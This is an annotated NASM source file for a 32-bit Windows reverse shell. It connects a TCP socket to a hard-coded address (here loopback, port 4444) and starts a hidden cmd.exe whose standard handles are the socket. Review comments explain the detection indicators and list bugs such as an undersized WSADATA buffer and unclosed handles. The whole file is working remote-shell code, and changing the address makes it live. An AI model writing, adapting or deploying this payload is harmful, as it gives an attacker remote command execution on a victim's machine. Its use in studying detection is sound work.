reverse_shell.asm
;-----------------------------------------------------------------------
; reverse_shell.asm — 32-bit Windows, NASM (Intel syntax).
;
; What this file does, as written: loads ws2_32.dll, initialises Winsock,
; opens a TCP socket, connects it to the hard-coded sockaddr_in below
; (127.0.0.1:4444), creates a job object, then launches cmd.exe with
; handle inheritance enabled and all three standard handles pointing at
; the socket, assigns the child to the job and waits for it to exit.
;
; ABI: every import is declared with the stdcall decoration (_Name@N), so
; the callee pops its own arguments; no "add esp, N" follows any call.
; Return values are only checked for LoadLibraryA, WSAStartup, WSASocketA
; and connect; the job-object and CreateProcessA calls are unchecked.
;
; Defender's view — the detection-relevant sequence here is: ws2_32 load
; -> WSASocketA/connect -> CreateProcessA("cmd.exe") with
; bInheritHandles = TRUE and hStdInput/hStdOutput/hStdError all equal to
; a socket handle. A console process whose std handles are sockets is a
; strong host-based indicator independent of the remote address.
;
; Items that look inconsistent in this file (left as-is, see notes):
;  * wsaData is 16 bytes but WSADATA is roughly 400 bytes on 32-bit, so
;    WSAStartup writes past this buffer into the data that follows it.
;  * jobinfo is a 48-byte block, but SetInformationJobObject is called
;    with information class 7 and a length of 8, so only its first 8
;    (zero) bytes are consumed; the `dd 2` at offset 32 is never read
;    by that call. Intent unclear — confirm against JOBOBJECTINFOCLASS.
;  * kernel32_dll, CreateJobObject_name, SetJobObject_name,
;    _GetProcAddress@8 and _CloseHandle@4 are declared but unused here.
;  * The socket, job and process/thread handles are never closed; the
;    function simply returns once cmd.exe exits.
;-----------------------------------------------------------------------
bits 32
section .data
; Receives WSAStartup's output. NOTE(review): WSADATA is ~400 bytes on
; 32-bit Windows, so this 16-byte buffer is undersized (see header).
wsaData db 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
; struct sockaddr_in (16 bytes): sin_family, sin_port, sin_addr, sin_zero[8].
; Port and address are stored in network byte order, hence the swapped bytes.
sockaddr_in:
dw 0x0002 ; AF_INET
dw 0x5C11 ; Port 4444 (little-endian)
dd 0x0100007F ; IP 127.0.0.1 (little-endian)
db 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
ws2_32_dll db 'ws2_32.dll', 0
; The three names below and the matching externs are not referenced by
; the code in this file; the APIs are imported directly instead.
kernel32_dll db 'kernel32.dll', 0
cmd db 'cmd.exe', 0
CreateJobObject_name db 'CreateJobObjectA', 0
SetJobObject_name db 'SetInformationJobObject', 0
; 48-byte buffer passed to SetInformationJobObject. Only a single dword
; at offset 32 is non-zero. NOTE(review): the call below passes class 7
; and length 8, which does not cover this dword — confirm the intended
; information class and structure layout.
jobinfo:
dd 0, 0, 0, 0
dd 0, 0, 0, 0
dd 2
dd 0
dd 0, 0
section .bss
hSocket resd 1
startupinfo resb 68                     ; sizeof(STARTUPINFOA) on 32-bit
processinfo resb 16                     ; PROCESS_INFORMATION: hProcess at +0
hJob resd 1
section .text
global Start                            ; entry symbol; link-time /entry not shown here
extern _LoadLibraryA@4
extern _GetProcAddress@8
extern _WSAStartup@8
extern _WSASocketA@24
extern _connect@12
extern _CreateProcessA@40
extern _WaitForSingleObject@8
extern _CloseHandle@4
extern _CreateJobObjectA@8
extern _SetInformationJobObject@16
extern _AssignProcessToJobObject@8
; void Start(void)
; Clobbers: eax, ecx (edi is saved/restored around the rep stosd).
; Every jump to `exit` is an early bail-out that simply returns.
Start:
; Zero startupinfo: 17 dwords * 4 = 68 bytes. .bss is already zero at
; load time, so this is belt-and-braces rather than required.
push edi
mov edi, startupinfo
xor eax, eax
mov ecx, 17
rep stosd
pop edi
; LoadLibraryA("ws2_32.dll") — bail out if the module cannot be loaded.
push ws2_32_dll
call _LoadLibraryA@4
test eax, eax
jz exit
; WSAStartup(MAKEWORD(2,2), &wsaData); non-zero return = error.
push wsaData
push 0x0202
call _WSAStartup@8
test eax, eax
jnz exit
; WSASocketA(AF_INET=2, SOCK_STREAM=1, IPPROTO_TCP=6, NULL, 0, dwFlags=0).
; dwFlags = 0 (no WSA_FLAG_OVERLAPPED) yields a handle usable directly
; as a console std handle below. INVALID_SOCKET is -1.
push 0
push 0
push 0
push 6
push 1
push 2
call _WSASocketA@24
mov [hSocket], eax
cmp eax, -1
je exit
; connect(hSocket, &sockaddr_in, 16); non-zero return = error.
push 16
push sockaddr_in
push dword [hSocket]
call _connect@12
test eax, eax
jnz exit
; CreateJobObjectA(NULL, NULL); return value not checked.
push 0
push 0
call _CreateJobObjectA@8
mov [hJob], eax
; SetInformationJobObject(hJob, 7, &jobinfo, 8) — argument order is
; right-to-left: length 8, buffer, class 7, handle. Return not checked.
push 0x00000008
push jobinfo
push 7
push dword [hJob]
call _SetInformationJobObject@16
; Fill STARTUPINFOA (offsets per the 32-bit layout):
;   +0  cb           = 68
;   +44 dwFlags      = STARTF_USESHOWWINDOW (0x1) | STARTF_USESTDHANDLES (0x100)
;   +48 wShowWindow  = 0 (SW_HIDE); the dword write also zeroes cbReserved2 at +50
;   +56/+60/+64 hStdInput/hStdOutput/hStdError = the connected socket
mov dword [startupinfo], 68
mov dword [startupinfo + 44], 0x101
mov dword [startupinfo + 48], 0
mov eax, [hSocket]
mov [startupinfo + 56], eax
mov [startupinfo + 60], eax
mov [startupinfo + 64], eax
; CreateProcessA(NULL, "cmd.exe", NULL, NULL, bInheritHandles=TRUE,
;                dwCreationFlags=0, NULL, NULL, &startupinfo, &processinfo)
; Return value not checked: on failure processinfo stays zeroed and the
; two calls below operate on a NULL process handle.
push processinfo
push startupinfo
push 0
push 0
push 0
push 1
push 0
push 0
push cmd
push 0
call _CreateProcessA@40
; AssignProcessToJobObject(hJob, processinfo.hProcess); unchecked.
push dword [processinfo]
push dword [hJob]
call _AssignProcessToJobObject@8
; WaitForSingleObject(processinfo.hProcess, INFINITE) — block until the
; child exits. No handles are closed afterwards.
push -1
push dword [processinfo]
call _WaitForSingleObject@8
exit:
ret